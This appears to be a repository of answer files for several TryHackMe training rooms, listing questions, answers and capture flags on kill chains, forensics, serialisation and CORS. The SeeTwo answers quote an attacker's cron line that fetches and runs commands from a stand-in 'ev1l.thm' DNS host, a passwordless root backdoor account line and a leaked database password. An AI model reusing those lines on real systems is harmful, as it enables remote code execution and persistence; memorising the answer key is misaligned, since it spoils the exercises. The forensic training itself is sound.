| Which framework looks at how to make it difficult for an adversary to change their approach when detected? 14 | Pyramid of Pain 15 | 16 | What is the improved Cyber Kill Chain framework called? 17 | The Unified Kill Chain 18 | 19 | How many phases are in the improved kill chain? 20 | 18 21 | 22 | What is the flag? 23 | THM{Sup3r-D3t3ct1v3} 24 | -------------------------------------------------------------------------------- /rooms/seetwo.txt: -------------------------------------------------------------------------------- 1 | SeeTwo 2 | https://tryhackme.com/room/seetworoom 3 | 4 | What is the first file that is read? Enter the full path of the file. 5 | /home/bella/.bash_history 6 | 7 | What is the output of the file from question 1? 8 | mysql -u root -p'vb0xIkSGbcEKBEi' 9 | 10 | What is the user that the attacker created as a backdoor? Enter the entire line that indicates the user. 11 | toor::0:0:root:/root:/bin/bash 12 | 13 | What is the name of the backdoor executable? 14 | /usr/bin/passswd 15 | 16 | What is the md5 hash value of the executable from question 4? 17 | 23c415748ff840b296d0b93f98649dec 18 | 19 | What was the first cronjob that was placed by the attacker? 20 | * * * * * /bin/sh -c "sh -c $(dig ev1l.thm TXT +short @ns.ev1l.thm)" 21 | 22 | What is the flag? 23 | THM{See2sNev3rGetOld} 24 | -------------------------------------------------------------------------------- /rooms/summit.txt: -------------------------------------------------------------------------------- 1 | Summit 2 | https://tryhackme.com/room/summit 3 | 4 | What is the first flag you receive after successfully detecting sample1.exe? 5 | THM{f3cbf08151a11a6a331db9c6cf5f4fe4} 6 | 7 | What is the second flag you receive after successfully detecting sample2.exe? 8 | THM{2ff48a3421a938b388418be273f4806d} 9 | 10 | What is the third flag you receive after successfully detecting sample3.exe? 11 | THM{4eca9e2f61a19ecd5df34c788e7dce16} 12 | 13 | What is the fourth flag you receive after successfully detecting sample4.exe? 14 | THM{c956f455fc076aea829799c0876ee399} 15 | 16 | What is the fifth flag you receive after successfully detecting sample5.exe? 17 | THM{46b21c4410e47dc5729ceadef0fc722e} 18 | 19 | What is the final flag you receive from Sphinx? 20 | THM{c8951b2ad24bbcbac60c16cf2c83d92c} 21 | -------------------------------------------------------------------------------- /rooms/tony the tiger.txt: -------------------------------------------------------------------------------- 1 | Tony the Tiger 2 | https://tryhackme.com/room/tonythetiger 3 | 4 | What is a great IRL example of an "Object"? 5 | lamp 6 | 7 | What is the acronym of a possible type of attack resulting from a "serialisation" attack? 8 | dos 9 | 10 | What lower-level format does data within "Objects" get converted into? 11 | byte streams 12 | 13 | What service is running on port "8080" 14 | Apache Tomcat/Coyote JSP engine 1.1 15 | 16 | What is the name of the front-end application running on "8080"? 17 | JBoss 18 | 19 | This flag will have the formatting of "THM{}" 20 | THM{Tony_Sure_Loves_Frosted_Flakes} 21 | 22 | This flag has the formatting of "THM{}" 23 | THM{50c10ad46b5793704601ecdad865eb06} 24 | 25 | The final flag does not have the formatting of "THM{}" 26 | zxcvbnm123456789 27 | -------------------------------------------------------------------------------- /rooms/cors & sop.txt: -------------------------------------------------------------------------------- 1 | CORS & SOP 2 | https://tryhackme.com/room/corsandsop 3 | 4 | What policy instructs web browsers how they should interact between web pages? 5 | Same-origin Policy 6 | 7 | What HTTP header specifies which domains are allowed to access the resources hosted in its server? 8 | Access-Control-Allow-Origin 9 | 10 | What origin configuration permits requests from any origin, is the least secure configuration, and should be used cautiously? 11 | Wildcard Origin 12 | 13 | What CORS misconfiguration occurs when a server accepts requests from the "null" origin? 14 | Null Origin Misconfiguration 15 | 16 | What is the flag from arbitrary.php? 17 | THM{4rB1tr4rY} 18 | 19 | What is the flag from badregex.php? 20 | THM{B4D_r363X} 21 | 22 | What is the flag from null.php? 23 | THM{nULL_0r1G1N} 24 | 25 | --------------------------------------------------------------------------------